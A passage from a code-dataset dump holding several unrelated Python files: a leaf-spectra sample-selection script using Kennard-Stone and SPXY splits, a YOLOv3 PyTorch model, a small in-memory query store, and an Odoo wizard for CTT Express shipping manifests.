\"\"\"implement random_split by using sklearn.model_selection.train_test_split function. 
See\n http://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html\n for more information.\n \"\"\"\n return train_test_split(\n spectra,\n test_size=test_size,\n random_state=random_state,\n shuffle=shuffle,\n stratify=stratify)\n\n\ndef kennardstone(spectra, test_size=0.25, metric='euclidean', *args, **kwargs):\n \"\"\"Kennard Stone Sample Split method\n Parameters\n ----------\n spectra: ndarray, shape of i x j\n i spectrums and j variables (wavelength/wavenumber/Raman shift and so on)\n test_size : float, int\n if float, then round(i x (1-test_size)) spectrums are selected as train data, by default 0.25\n if int, then test_size is directly used as test data size\n metric : str, optional\n The distance metric to use, by default 'euclidean'\n See scipy.spatial.distance.cdist for more information\n Returns\n -------\n select_pts: list\n index of selected spectrums as train data, index is zero based\n remaining_pts: list\n index of remaining spectrums as test data, index is zero based\n References\n --------\n Kennard, R. W., & Stone, L. A. (1969). Computer aided design of experiments.\n Technometrics, 11(1), 137-148. (https://www.jstor.org/stable/1266770)\n \"\"\"\n\n if test_size < 1:\n train_size = round(spectra.shape[0] * (1 - test_size))\n else:\n train_size = spectra.shape[0] - round(test_size)\n\n if train_size > 2:\n distance = cdist(spectra, spectra, metric=metric, *args, **kwargs)\n select_pts, remaining_pts = max_min_distance_split(distance, train_size)\n else:\n raise ValueError(\"train sample size should be at least 2\")\n\n return select_pts, remaining_pts\n\n\ndef spxy(spectra, yvalues, test_size=0.25, metric='euclidean', *args, **kwargs):\n \"\"\"SPXY Sample Split method\n Parameters\n ----------\n spectra: ndarray, shape of i x j\n i spectrums and j variables (wavelength/wavenumber/Raman shift and so on)\n test_size : float, int\n if float, then round(i x (1-test_size)) spectrums are selected as train data, by default 0.25\n if int, then test_size is directly used as test data size\n metric : str, optional\n The distance metric to use, by default 'euclidean'\n See scipy.spatial.distance.cdist for more information\n Returns\n -------\n select_pts: list\n index of selected spectrums as train data, index is zero based\n remaining_pts: list\n index of remaining spectrums as test data, index is zero based\n References\n ---------\n Galvao et al. (2005). A method for calibration and validation subset partitioning.\n Talanta, 67(4), 736-740. (https://www.sciencedirect.com/science/article/pii/S003991400500192X)\n \"\"\"\n\n
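 # SPXY extends Kennard-Stone: distances in X (spectra) and in y are each max-normalized, then summed.\n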
 if test_size < 1:\n train_size = round(spectra.shape[0] * (1 - test_size))\n else:\n train_size = spectra.shape[0] - round(test_size)\n\n if train_size > 2:\n yvalues = yvalues.reshape(yvalues.shape[0], -1)\n distance_spectra = cdist(spectra, spectra, metric=metric, *args, **kwargs)\n distance_y = cdist(yvalues, yvalues, metric=metric, *args, **kwargs)\n distance_spectra = distance_spectra / distance_spectra.max()\n distance_y = distance_y / distance_y.max()\n\n distance = distance_spectra + distance_y\n select_pts, remaining_pts = max_min_distance_split(distance, train_size)\n else:\n raise ValueError(\"train sample size should be at least 2\")\n\n return select_pts, remaining_pts\n\n\ndef max_min_distance_split(distance, train_size):\n \"\"\"sample set split method based on maximum minimum distance, which is the core of Kennard Stone\n method\n Parameters\n ----------\n distance : distance matrix\n semi-positive real symmetric matrix of a certain distance metric\n train_size : train data sample size\n should be greater than 2\n Returns\n -------\n select_pts: list\n index of selected spectrums as train data, index is zero-based\n remaining_pts: list\n index of remaining spectrums as test data, index is zero-based\n \"\"\"\n\n select_pts = []\n remaining_pts = [x for x in range(distance.shape[0])]\n\n # first select 2 farthest points\n first_2pts = np.unravel_index(np.argmax(distance), distance.shape)\n select_pts.append(first_2pts[0])\n select_pts.append(first_2pts[1])\n\n # remove the first 2 points from the remaining list\n remaining_pts.remove(first_2pts[0])\n remaining_pts.remove(first_2pts[1])\n\n for i in range(train_size - 2):\n # find the maximum minimum distance\n select_distance = distance[select_pts, :]\n min_distance = select_distance[:, remaining_pts]\n min_distance = np.min(min_distance, axis=0)\n max_min_distance = np.max(min_distance)\n\n # select the first point (in case that several distances are the same, choose the first one)\n points = np.argwhere(select_distance == max_min_distance)[:, 1].tolist()\n for point in points:\n if point in select_pts:\n pass\n else:\n select_pts.append(point)\n remaining_pts.remove(point)\n break\n return select_pts, remaining_pts\n\n\n## main:\ndir_spec = r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\spectra\\OD'\ndir_t = r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\traits'\ndir_out =r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\meta'\n\ndf_t = pd.read_csv(f'{dir_t}/shift_DS_Predict_NEON_v3.csv')\ndf_spec = pd.read_csv(f'{dir_spec}/ovendried_spectra_sample_mean.csv')\n\n## parse the sample ID, exclude NPVs\ndir_in = r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\meta'\n# df_sample = pd.read_csv(f'{dir_in}/processed/sample_list_simplified.csv')\ndf_iform = pd.read_csv(f'{dir_in}/processed/sample_list_simplified_ORNL_v3.csv', encoding='unicode_escape')\ndf_inv = pd.read_csv(f'{dir_in}/processed/SHIFT_sample_inventory_20230308.csv')\n# Clean the df_inv\ndf_inv = df_inv[df_inv['Sample Number'] != '131_flower']\ndf_inv = df_inv[df_inv['Sample Number'] != '161_S'].reset_index(drop=True)\nn_inv = df_inv['Sample Number'].unique().astype(int)\nn_inv_OD = df_inv.loc[(df_inv['Type']=='OD') | (df_inv['Type']=='BK'), 'Sample Number'].unique().astype(int)\n# match the spec sample with inv\nsample_n = df_spec['sample_ID'].str.split('_').str.get(1).astype(int)\ndiff_spec2inv = set(sample_n).difference(n_inv) # {1824, 1678, 531, 1689, 1693, 
1694}\ndiff_inv2spec = set(n_inv_OD).difference(sample_n) # { 551, 40, 1601, 71, 174, 1776, 755, 1859, 335, 336, 346, 374, 376, 449, 451, 1012}\n\n# filter out NPV based on df_iform\nspec_meta = pd.DataFrame(df_spec['sample_ID'])\nspec_meta['Sample Number'] = sample_n\nNPV = df_iform.loc[(df_iform['Species or type'] == 'NPV') & (df_iform['Sample Taken?'] == 'Yes'), 'Sample Number']\n# filter out flower/seeds/full senescence samples\n# clean the phenophase column\ndf_iform['Pheno'] = df_iform['Phenophase (if rare flowers or seeds, add as multi-select - if sampling flowers separately, add new entry)'].str.split(',').str.get(0)\ndropV = df_iform.loc[(df_iform['Pheno'] == 'Flowers') | (df_iform['Pheno'] == 'Full senescence') | (df_iform['Pheno'] == 'Seeds'), 'Sample Number']\n# drop nan and convert to int\nNPV = list(NPV[~NPV.isna()].astype(int))\n# find bulk from inventory\nBK = df_inv.loc[df_inv['Type']=='BK', 'Sample Number'].unique().astype(int)\n# no scan list from Natalie\ndf_noScan = pd.read_csv(f'{dir_out}/Lists_from_others/sample_no_LMA_scans.csv')\nnoScan = df_noScan['no scans'].astype(int)\n\ndrop_ls = NPV + list(dropV[~dropV.isna()].astype(int)) + list(BK) + list(noScan)\nidx = ~spec_meta['Sample Number'].isin(drop_ls)\nspec_meta_veg = spec_meta[idx].reset_index(drop=True)\nspec_veg = df_spec[idx].iloc[:, 1:].values\n\n\n# select and match the corresponding traits\ntrait_ls = ['Cellulose', 'Fiber', 'Lignin', 'Nitrogen', 'Calcium', 'NSC', 'Phenolics']\ntrait_m = [x + '_M' for x in trait_ls]\n\ntraits = df_t.loc[idx, trait_m].values\n\n# select 200 samples\nratio = 1 - 200/spec_veg.shape[0]\n\nx_train_index, x_test_index = kennardstone(spec_veg, test_size=ratio)\n\nspec_ls = spec_meta_veg.iloc[x_train_index, :]\n\n\n# combine spec and traits\n# remove the traits record with nan\nidx_t = ~np.isnan(traits).any(axis=1)\nratio = 1 - 200/spec_veg[idx_t, :].shape[0]\nx_train_index, x_test_index = spxy(spec_veg[idx_t, :], traits[idx_t, :], test_size=ratio)\n\nspec_meta_veg_sub = spec_meta_veg[idx_t].reset_index(drop=True)\nspec_t_ls = spec_meta_veg_sub.iloc[x_train_index, :]\ncommon_n = set(spec_ls['Sample Number']).intersection(set(spec_t_ls['Sample Number']))\ncommon_ls = spec_ls[spec_ls['Sample Number'].isin(common_n)]\n# perform join to get more info\n\nspec_ls_meta = spec_ls.merge(df_iform, how='left', on='Sample Number')\nspec_t_ls_meta = spec_t_ls.merge(df_iform, how='left', on='Sample Number')\ncommon_ls_meta = common_ls.merge(df_iform, how='left', on='Sample Number')\n\n# add more info from Elsa and wetland\ndf_elsa = pd.read_csv(f'{dir_out}/Lists_from_others/SHIFT_UCLA_JPL_Sample_IDs.csv')\ndf_wetland = pd.read_csv(f'{dir_out}/Lists_from_others/SHIFT_wetland_samples_Silva.csv')\ndf_wetland.rename(columns={'sample_id': 'Sample Number'}, inplace=True)\ndf_elsa.rename(columns={'JPL_sample_ID': 'Sample Number'}, inplace=True)\n\nspec_ls_meta = spec_ls_meta.merge(df_elsa.loc[:, ['Sample Number', 'species_code']].drop_duplicates(), how='left', on='Sample Number')\nspec_ls_meta = spec_ls_meta.merge(df_wetland.loc[:, ['Sample Number', 'species']].drop_duplicates(), how='left', on='Sample Number')\n\nspec_t_ls_meta = spec_t_ls_meta.merge(df_elsa.loc[:, ['Sample Number', 'species_code']].drop_duplicates(), how='left', on='Sample Number')\nspec_t_ls_meta = spec_t_ls_meta.merge(df_wetland.loc[:, ['Sample Number', 'species']].drop_duplicates(), how='left', on='Sample Number')\n\ncommon_ls_meta = common_ls_meta.merge(df_elsa.loc[:, ['Sample Number', 'species_code']].drop_duplicates(), 
how='left', on='Sample Number')\ncommon_ls_meta = common_ls_meta.merge(df_wetland.loc[:, ['Sample Number', 'species']].drop_duplicates(), how='left', on='Sample Number')\n\nspec_ls_meta.to_csv(f'{dir_out}/selected_sample_list_based_on_dryspec_v2.csv', index=False)\nspec_t_ls_meta.to_csv(f'{dir_out}/selected_sample_list_based_on_dryspec_traits_v2.csv', index=False)\ncommon_ls_meta.to_csv(f'{dir_out}/selected_sample_list_in_common_v2.csv', index=False)\n\n#%%----------------- With the final list, check if the sample has both OD and FF parts-------------------------------\ndir_in =r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\meta'\ndf_od_final = pd.read_csv(f'{dir_out}/selected_samples_final_correctdate.csv')\ndf_inv = pd.read_csv(f'{dir_in}/processed/SHIFT_sample_inventory_20230308.csv')\n# Clean the df_inv\ndf_inv = df_inv[df_inv['Sample Number'] != '131_flower']\ndf_inv = df_inv[df_inv['Sample Number'] != '161_S'].reset_index(drop=True)\n\n# FF sample list from df_inv\nn_ff = df_inv.loc[df_inv['Type']=='FF', 'Sample Number'].astype(int)\nn_od_final = df_od_final['sample number'].astype(int)\nn_common = set(n_od_final).intersection(n_ff)\nn_dif = set(n_od_final).difference(n_ff)\ndf_common = df_od_final[df_od_final['sample number'].isin(n_common)]\ndf_common.to_csv(f'{dir_out}/selected_sample_final_wt_od_ff.csv', index=False)\npd.DataFrame(n_dif).to_csv(f'{dir_out}/no_FF_samples.csv')\n\n# Overall comparison\ndf_iform = pd.read_csv(f'{dir_in}/processed/sample_list_simplified_ORNL_v3.csv', encoding='unicode_escape')\nNPV_BK = df_iform.loc[((df_iform['Species or type'] == 'NPV') | (df_iform['Species or type'] == 'Bulk sample')) & (df_iform['Sample Taken?'] == 'Yes'), 'Sample Number']\nNPV_BK = list(NPV_BK[~NPV_BK.isna()].astype(int))\n\n# only keep od and FF from inventory\ndf_inv = df_inv[(df_inv['Type']=='OD') | (df_inv['Type']=='FF')]\n# drop NPV from inventory\nidx = ~df_inv['Sample Number'].astype(int).isin(NPV_BK)\ndf_inv = df_inv[idx]\n\nn_od = df_inv.loc[df_inv['Type']=='OD', 'Sample Number'].unique().astype(int)\nn_ff = df_inv.loc[df_inv['Type']=='FF', 'Sample Number'].unique().astype(int)\n\nn_com = set(n_ff).intersection(set(n_od))\nn_ff_only = set(n_ff).difference(set(n_od))\nn_od_only = set(n_od).difference(set(n_ff))\n\npd.DataFrame(n_ff_only).to_csv(f'{dir_in}/UWM_inv_sort/FF_only_in_inv_exclude_NPV_BK.csv', index=False)\npd.DataFrame(n_od_only).to_csv(f'{dir_in}/UWM_inv_sort/OD_only_in_inv_exclude_NPV_BK.csv', index=False)\npd.DataFrame(n_com).to_csv(f'{dir_in}/UWM_inv_sort/OD_and_FF_in_inv_exclude_NPV_BK.csv', index=False)\n\n#%%-------------------------Check the final list against the most recent flash frozen list----------------\ndir_in =r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\meta'\ndf_od_final = pd.read_csv(f'{dir_in}/selected_samples_final_correctdate.csv')\ndf_od_done = pd.read_csv(f'{dir_in}/selected_sample_final_wt_od_ff.csv')\ndf_ff = pd.read_csv(f'{dir_in}/raw/SHIFT_flash_frozen_UWM.csv', encoding='unicode_escape')\nn_final = df_od_final['sample number'].astype(int)\nn_ff = df_ff['sample number'].astype(int)\nn_done = df_od_done['sample number'].astype(int)\nn_com = set(n_final).intersection(set(n_ff))\nn_dif = set(n_final).difference(set(n_ff)) # {384, 1665, 259, 37, 933, 1531, 1208, 1529, 1659, 125, 1662}\nn_todo = set(n_com).difference(set(n_done))\ndf = pd.DataFrame(data=n_todo, columns=['sample number'])\ndf.to_csv(f'{dir_in}/samples_todo.csv', index=False)\n\n#%%---------------------------- select N/15N/13C samples within the sample_todo + 
wt_od_ff list\ndir_in =r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\meta'\ndir_t = r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\traits'\ndir_spec = r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\spectra\\OD'\n\ndf_od_done = pd.read_csv(f'{dir_in}/selected_sample_final_wt_od_ff.csv')\ndf_ff = pd.read_csv(f'{dir_in}/samples_todo.csv')\ndf_t = pd.read_csv(f'{dir_t}/shift_DS_Predict_NEON_v3.csv')\ndf_spec = pd.read_csv(f'{dir_spec}/ovendried_spectra_sample_mean.csv')\ndf_spec['sample number'] = df_spec['sample_ID'].str.split('_').str.get(1).astype(int)\n\n# target list\ntgt = list(df_od_done['sample number'].astype(int)) + list(df_ff['sample number'].astype(int))\nidx = df_spec['sample number'].isin(tgt)\ndf_trait = df_t.loc[idx, ['d13C_M', 'd15N_M', 'Nitrogen_M']].reset_index(drop=True)\ntgt_sample = df_spec.loc[idx, 'sample number'].reset_index(drop=True)\ntraits = df_trait.values\nratio = 1 - 36/traits.shape[0]\n\nx_train_index, x_test_index = kennardstone(traits, test_size=ratio)\nselect_traits = traits[x_train_index, :]\nsample_select = tgt_sample[x_train_index]\nsample_select = pd.DataFrame(data=sample_select, columns=['sample number'])\nsample_select.to_csv(f'{dir_in}/36_isotope_samples.csv', index=False)\n","repo_name":"SeltaZheng/shift_traits","sub_path":"LeafSample/SampleSelection.py","file_name":"SampleSelection.py","file_ext":"py","file_size_in_byte":15381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72353363290","text":"# -*- coding: utf-8 -*-\n# Written by yq_yao\n# \nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.nn.init as init\nfrom model.darknet53 import Darknet53\nimport os\nfrom utils.box_utils import permute_sigmoid, decode\nfrom layers.yolo_layer import YoloLayer\n\ndef xavier(param):\n init.xavier_uniform(param)\n\n# kaiming_weights_init\ndef weights_init(m):\n for key in m.state_dict():\n if key.split('.')[-1] == 'weight':\n if 'conv' in key:\n init.kaiming_normal_(m.state_dict()[key], mode='fan_out')\n if 'bn' in key:\n m.state_dict()[key][...] = 1\n elif key.split('.')[-1] == 'bias':\n m.state_dict()[key][...] = 0\n\n\n# def weights_init(m):\n# for key in m.state_dict():\n# if key.split('.')[-1] == 'weight':\n# if 'conv' in key:\n# init.xavier_uniform(m.state_dict()[key])\n# if 'bn' in key:\n# m.state_dict()[key][...] = 1\n# elif key.split('.')[-1] == 'bias':\n# m.state_dict()[key][...] 
= 0\n\nclass ConvBN(nn.Module):\n def __init__(self, ch_in, ch_out, kernel_size=3, stride=1, padding=0):\n super().__init__()\n self.conv = nn.Conv2d(ch_in, ch_out, kernel_size=kernel_size, stride=stride, padding=padding, bias=False)\n self.bn = nn.BatchNorm2d(ch_out, momentum=0.01)\n\n def forward(self, x):\n return F.leaky_relu(self.bn(self.conv(x)), negative_slope=0.1, inplace=True)\n\nclass DetectionLayer(nn.Module):\n def __init__(self, anchors, anchors_mask, input_wh, num_classes):\n super(DetectionLayer, self).__init__()\n self.anchors = anchors\n self.input_wh = input_wh\n self.anchors_mask = anchors_mask\n self.num_classes = num_classes\n \n def forward(self, x):\n l_data, m_data, h_data = x\n l_grid_wh = (l_data.size(3), l_data.size(2))\n m_grid_wh = (m_data.size(3), m_data.size(2))\n h_grid_wh = (h_data.size(3), h_data.size(2))\n\n pred_l, stride_l = permute_sigmoid(l_data, self.input_wh, 3, self.num_classes)\n pred_m, stride_m = permute_sigmoid(m_data, self.input_wh, 3, self.num_classes)\n pred_h, stride_h = permute_sigmoid(h_data, self.input_wh, 3, self.num_classes)\n\n anchors1 = self.anchors[self.anchors_mask[0][0]: self.anchors_mask[0][-1]+1]\n anchors2 = self.anchors[self.anchors_mask[1][0]: self.anchors_mask[1][-1]+1]\n anchors3 = self.anchors[self.anchors_mask[2][0]: self.anchors_mask[2][-1]+1]\n \n decode_l = decode(pred_l.detach(), self.input_wh, anchors1, self.num_classes, stride_l)\n decode_m = decode(pred_m.detach(), self.input_wh, anchors2, self.num_classes, stride_m)\n decode_h = decode(pred_h.detach(), self.input_wh, anchors3, self.num_classes, stride_h)\n decode_pred = torch.cat((decode_l, decode_m, decode_h), 1)\n\n return decode_pred\n\ndef predict_conv_list1(num_classes):\n layers = list()\n layers += [ConvBN(1024, 512, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(512, 1024, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(1024, 512, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(512, 1024, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(1024, 512, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(512, 1024, kernel_size=3, stride=1, padding=1)]\n layers += [nn.Conv2d(1024, (5 + num_classes) * 3, kernel_size=1, stride=1, padding=0)]\n return layers\n\ndef predict_conv_list2(num_classes):\n layers = list()\n layers += [ConvBN(768, 256, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(256, 512, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(512, 256, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(256, 512, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(512, 256, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(256, 512, kernel_size=3, stride=1, padding=1)]\n layers += [nn.Conv2d(512, (5 + num_classes) * 3, kernel_size=1, stride=1, padding=0)]\n return layers\n\ndef predict_conv_list3(num_classes):\n layers = list()\n layers += [ConvBN(384, 128, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(128, 256, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(256, 128, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(128, 256, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(256, 128, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(128, 256, kernel_size=3, stride=1, padding=1)]\n layers += [nn.Conv2d(256, (5 + num_classes) * 3, kernel_size=1, stride=1, padding=0)]\n return layers\n\nclass YOLOv3(nn.Module):\n def __init__(self, phase, num_blocks, anchors, anchors_mask, input_wh, num_classes):\n super().__init__()\n self.phase = phase\n 
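 # Darknet-53 backbone plus three scale heads; coarse features are upsampled and concatenated with c4/c3 before the later heads.\n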
self.extractor = Darknet53(num_blocks)\n        self.predict_conv_list1 = nn.ModuleList(predict_conv_list1(num_classes))\n        self.smooth_conv1 = ConvBN(512, 256, kernel_size=1, stride=1, padding=0)\n        self.predict_conv_list2 = nn.ModuleList(predict_conv_list2(num_classes))\n        self.smooth_conv2 = ConvBN(256, 128, kernel_size=1, stride=1, padding=0)\n        self.predict_conv_list3 = nn.ModuleList(predict_conv_list3(num_classes))\n        if phase == \"test\":\n            self.detection = DetectionLayer(anchors, anchors_mask, input_wh, num_classes)\n\n    def forward(self, x, targets=None):\n        c3, c4, c5 = self.extractor(x)\n        x = c5\n        # predict_list1\n        for i in range(5):\n            x = self.predict_conv_list1[i](x)\n        smt1 = self.smooth_conv1(x)\n        smt1 = F.upsample(smt1, scale_factor=2, mode='nearest')\n\n        smt1 = torch.cat((smt1, c4), 1)\n        for i in range(5, 7):\n            x = self.predict_conv_list1[i](x)\n        out1 = x\n\n        x = smt1\n        for i in range(5):\n            x = self.predict_conv_list2[i](x)\n        smt2 = self.smooth_conv2(x)\n        smt2 = F.upsample(smt2, scale_factor=2, mode='nearest')\n        smt2 = torch.cat((smt2, c3), 1)\n        for i in range(5, 7):\n            x = self.predict_conv_list2[i](x)\n        out2 = x\n        x = smt2\n        for i in range(7):\n            x = self.predict_conv_list3[i](x)\n        out3 = x\n\n        if self.phase == \"test\":\n            detections = self.detection((out1, out2, out3))\n            return detections\n        elif self.phase == \"train\":\n            detections = (out1, out2, out3)\n            return detections\n    \n    def load_weights(self, base_file):\n        other, ext = os.path.splitext(base_file)\n        # note: \"ext == '.pkl' or '.pth'\" was always truthy; compare both extensions explicitly\n        if ext == '.pkl' or ext == '.pth':\n            print('Loading weights into state dict...')\n            self.extractor.load_state_dict(torch.load(base_file))\n            print(\"initing darknet53 ......\")\n            self.predict_conv_list1.apply(weights_init)\n            self.smooth_conv1.apply(weights_init)\n            self.predict_conv_list2.apply(weights_init)\n            self.smooth_conv2.apply(weights_init)\n            self.predict_conv_list3.apply(weights_init)\n            print('Finished!')\n        else:\n            print('Sorry only .pth and .pkl files supported.')\n\ndef Yolov3(phase, input_wh, anchors, anchors_mask, num_classes):\n    num_blocks = [1,2,8,8,4]\n    return YOLOv3(phase, num_blocks, anchors, anchors_mask, input_wh, num_classes)\n","repo_name":"yqyao/YOLOv3_Pytorch","sub_path":"model/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":7382,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"32"} +{"seq_id":"69946979293","text":"#!/usr/bin/env python\r\nfrom typing import Dict, List, Tuple, Any\r\nfrom dateutil.parser import parse as parse_date\r\n\r\nSUPPORTED_QUERY_OPERATORS = (\r\n    '$ne', '$eq', '$in', '$nin', '$gt', '$gte', '$lt', '$lte'\r\n)\r\n\r\n\r\nclass Store:\r\n\r\n    def __init__(self):\r\n        self._store = []\r\n\r\n    @staticmethod\r\n    def to_dict(data: Dict) -> Dict:\r\n        tmp = {}\r\n        for field in data:\r\n            value = data[field]\r\n\r\n            if hasattr(value, \"day\") and hasattr(value, \"fromtimestamp\"):\r\n                value = str(value)\r\n\r\n            tmp[field] = value\r\n        return tmp\r\n\r\n    def insert(self, obj):\r\n        self._store.append(obj)\r\n        return Store.to_dict(obj)\r\n\r\n    def delete(self, param_list: List[Dict]) -> List[Dict]:\r\n        matched_items, unmatched_items = self._list(param_list)\r\n        self._store = unmatched_items\r\n        return [Store.to_dict(matched_item) for matched_item in matched_items]\r\n\r\n    def update(self, param_list: List[Dict], data: Dict) -> List[Dict]:\r\n        tmp = []\r\n        update_items = []\r\n        for item in self._store:\r\n            matched = []\r\n            for param in param_list:\r\n                matched.append(_match_param(param, item))\r\n\r\n            not_match_count = matched.count(False)\r\n\r\n            if 
not_match_count == 0:\r\n item.update(data)\r\n update_items.append(item)\r\n\r\n tmp.append(item)\r\n\r\n self._store = tmp\r\n return [Store.to_dict(updated_item) for updated_item in update_items]\r\n\r\n def find_by_id(self, _id) -> Dict:\r\n result = self.list_objects(\r\n [{\"id\": {\"$eq\": _id}}], {\"offset\": 0, \"limit\": 1})\r\n if result:\r\n return Store.to_dict(result[0])\r\n return {}\r\n\r\n def find_by_params(self, param_list: List[Dict]) -> Dict:\r\n result = self.list_objects(param_list, {\"offset\": 0, \"limit\": 1})\r\n if result:\r\n return Store.to_dict(result[0])\r\n return {}\r\n\r\n def list_objects(\r\n self, param_list: List[Dict] = None,\r\n pagination: Dict = None) -> List[Dict]:\r\n\r\n if not param_list and not pagination:\r\n return self._store\r\n\r\n return self._list(param_list, pagination)[0]\r\n \r\n def count_objects(self, param_list: List[Dict] = None) -> Dict:\r\n if not param_list:\r\n return {\"count\": len(self._store)}\r\n\r\n return {\"count\": len(self._list(param_list)[0])}\r\n\r\n def _list(\r\n self, param_list: List[Dict],\r\n pagination: Dict = None) -> Tuple[List[Dict], List[Dict]]:\r\n unmatched_items = []\r\n matched_items = []\r\n\r\n pagination = {\r\n 'offset': 0,\r\n 'limit': len(self._store)\r\n } if not pagination else pagination\r\n offset_count = 0\r\n limit_count = 0\r\n for item in self._store:\r\n matched = []\r\n for param in param_list:\r\n matched.append(_match_param(param, item))\r\n\r\n not_matched_count = matched.count(False)\r\n\r\n if not_matched_count == 0 and \\\r\n offset_count == pagination['offset'] and \\\r\n limit_count < pagination['limit']:\r\n matched_items.append(item)\r\n limit_count += 1\r\n elif not_matched_count == 0 and offset_count < pagination['offset']:\r\n offset_count += 1\r\n else:\r\n unmatched_items.append(item)\r\n\r\n return (\r\n [Store.to_dict(matched_item) for matched_item in matched_items],\r\n [\r\n Store.to_dict(unmatched_item)\r\n for unmatched_item in unmatched_items\r\n ]\r\n )\r\n\r\n @staticmethod\r\n def _list_param_parser(param_list: List[Dict] = None):\r\n if not param_list:\r\n return param_list\r\n\r\n new_params = []\r\n\r\n for param in param_list:\r\n\r\n for qualifier in SUPPORTED_QUERY_OPERATORS:\r\n\r\n for field in param:\r\n\r\n if field.get(qualifier) == '$date':\r\n if not hasattr(\r\n param[field][qualifier],\r\n \"title\") and hasattr(\r\n param[field][qualifier], 'append'):\r\n\r\n new_params[field][qualifier] = [\r\n parse_date(date_str)\r\n for date_str in param_list[field][qualifier]]\r\n\r\n elif hasattr(param_list[field][qualifier], \"title\"):\r\n new_params[field][qualifier] = parse_date(\r\n param_list[field][qualifier])\r\n\r\n return new_params\r\n\r\n\r\ndef convert_if_date(value: Any):\r\n if hasattr(value, 'items') and hasattr(value, \"fromkeys\"):\r\n return parse_date(value[\"$date\"])\r\n return value\r\n\r\n\r\ndef _match_param(params: Dict, value: Dict) -> bool:\r\n for field in params:\r\n for operator in params[field].keys():\r\n operator_value = convert_if_date(params[field][operator])\r\n field_value = value.get(field)\r\n if operator == \"$eq\":\r\n return operator_value == field_value\r\n elif operator == \"$ne\":\r\n return operator_value != field_value\r\n elif operator == \"$lt\":\r\n return field_value < operator_value\r\n elif operator == \"$lte\":\r\n return (\r\n field_value < operator_value or\r\n field_value == operator_value\r\n )\r\n elif operator == \"$gt\":\r\n return field_value > operator_value\r\n elif operator == 
\"$gte\":\r\n return (\r\n field_value > operator_value or\r\n field_value == operator_value\r\n )\r\n elif operator == \"$nin\":\r\n return field_value not in operator_value\r\n elif operator == \"$in\":\r\n return field_value in operator_value\r\n","repo_name":"etsalah/taskhog","sub_path":"models/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22927077907","text":"import base64\n\nfrom odoo import fields, models\n\n\nclass CTTExpressManifestWizard(models.TransientModel):\n _name = \"cttexpress.manifest.wizard\"\n _description = \"Get the CTT Express Manifest for the given date range\"\n\n document_type = fields.Selection(\n selection=[(\"XLSX\", \"Excel\"), (\"PDF\", \"PDF\")],\n string=\"Format\",\n default=\"XLSX\",\n required=True,\n )\n from_date = fields.Date(required=True, default=fields.Date.context_today)\n to_date = fields.Date(required=True, default=fields.Date.context_today)\n carrier_ids = fields.Many2many(\n string=\"Filter accounts\",\n comodel_name=\"delivery.carrier\",\n domain=[(\"delivery_type\", \"=\", \"cttexpress\")],\n help=\"Leave empty to gather all the CTT account manifests\",\n )\n state = fields.Selection(\n selection=[(\"new\", \"new\"), (\"done\", \"done\")],\n default=\"new\",\n readonly=True,\n )\n attachment_ids = fields.Many2many(\n comodel_name=\"ir.attachment\", readonly=True, string=\"Manifests\"\n )\n\n def get_manifest(self):\n \"\"\"List of shippings for the given dates as CTT provides them\"\"\"\n carriers = self.carrier_ids or self.env[\"delivery.carrier\"].search(\n [(\"delivery_type\", \"=\", \"cttexpress\")]\n )\n # Avoid getting repeated manifests. Carriers with different service\n # configuration would produce the same manifest.\n unique_accounts = {\n (c.cttexpress_customer, c.cttexpress_contract, c.cttexpress_agency)\n for c in carriers\n }\n filtered_carriers = self.env[\"delivery.carrier\"]\n for customer, contract, agency in unique_accounts:\n filtered_carriers += fields.first(\n carriers.filtered(\n lambda x: x.cttexpress_customer == customer\n and x.cttexpress_contract == contract\n and x.cttexpress_agency == agency\n )\n )\n for carrier in filtered_carriers:\n ctt_request = carrier._ctt_request()\n from_date = fields.Date.to_string(self.from_date)\n to_date = fields.Date.to_string(self.to_date)\n error, manifest = ctt_request.report_shipping(\n \"ODOO\", self.document_type, from_date, to_date\n )\n carrier._ctt_check_error(error)\n carrier._ctt_log_request(ctt_request)\n for _filename, file in manifest:\n filename = \"{}{}{}-{}-{}.{}\".format(\n carrier.cttexpress_customer,\n carrier.cttexpress_contract,\n carrier.cttexpress_agency,\n from_date.replace(\"-\", \"\"),\n to_date.replace(\"-\", \"\"),\n self.document_type.lower(),\n )\n self.attachment_ids += self.env[\"ir.attachment\"].create(\n {\n \"datas\": base64.b64encode(file),\n \"name\": filename,\n \"res_model\": self._name,\n \"res_id\": self.id,\n \"type\": \"binary\",\n }\n )\n self.state = \"done\"\n return dict(\n self.env[\"ir.actions.act_window\"]._for_xml_id(\n \"delivery_cttexpress.action_delivery_cttexpress_manifest_wizard\"\n ),\n res_id=self.id,\n 
